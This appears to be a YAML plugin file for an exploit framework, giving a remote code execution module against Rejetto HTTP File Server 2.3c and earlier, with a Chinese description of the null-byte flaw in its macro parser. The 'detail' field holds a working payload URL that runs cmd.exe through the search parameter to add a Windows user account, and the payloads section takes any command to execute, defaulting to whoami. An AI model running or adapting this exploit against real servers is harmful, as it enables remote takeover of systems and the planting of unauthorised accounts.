info:
    app: HFS
    name: rce
    author: lz520520
    plugin_version: 1.0.0
    disclosure_date: "2017-03-07"
    create_date: "2024-10-06 07:33:50"
    update_date: "2024-10-06 07:33:50"
    scope: 2.3c以前的2.3x版本
    description: |-
        HTTP File Server是一款专为个人用户所设计的HTTP文件服务器，它提供虚拟档案系统，支持新增、移除虚拟档案资料夹等。
        Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞，该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
    detail: http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}
payloads:
    - name: cmd1
      alias: 命令执行
      params:
          - key: cmd
            title: 命令
            param_type: edit
            default_value: whoami
            required: true
